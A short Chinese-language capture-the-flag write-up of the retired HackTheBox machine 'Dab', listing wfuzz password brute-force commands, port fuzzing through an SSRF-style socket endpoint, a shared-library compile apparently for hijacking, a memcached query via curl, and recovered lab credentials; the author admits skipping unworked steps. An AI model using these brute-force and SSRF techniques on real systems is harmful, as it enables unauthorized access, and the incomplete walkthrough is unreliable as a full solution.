HTB-靶机-Dab

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.86

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.86 -o ./Dab-autorecon

可能用到的知识点

进行模糊爆破密码
wfuzz -c --hl=18 -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login

admin:Password1

wfuzz -u http://10.10.10.86:8080/ -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt --hh 324 -b password=FUZZ

secret

探测可能开放的端口
wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=bmfx' -H "Cookie: password=secret" --hc=500

login: genevieve   password: Princess1

gcc -shared -fPIC /dev/shm/bmfx.c -o /dev/shm/libseclogin.so

s3cur3l0g1n

curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq .
本靶机通过上述命令和burpsuite重放都没法获取用户名和加密的hash,原因未知,重置过靶机也是一样的情况,根据网上的资料直接跳过过程,拿去到flag,本靶机不做记录

参考:
https://0xdf.gitlab.io/2019/02/02/htb-dab.html
迷茫的人生,需要不断努力,才能看清远方模糊的志向!
原文地址:https://www.cnblogs.com/autopwn/p/14132961.html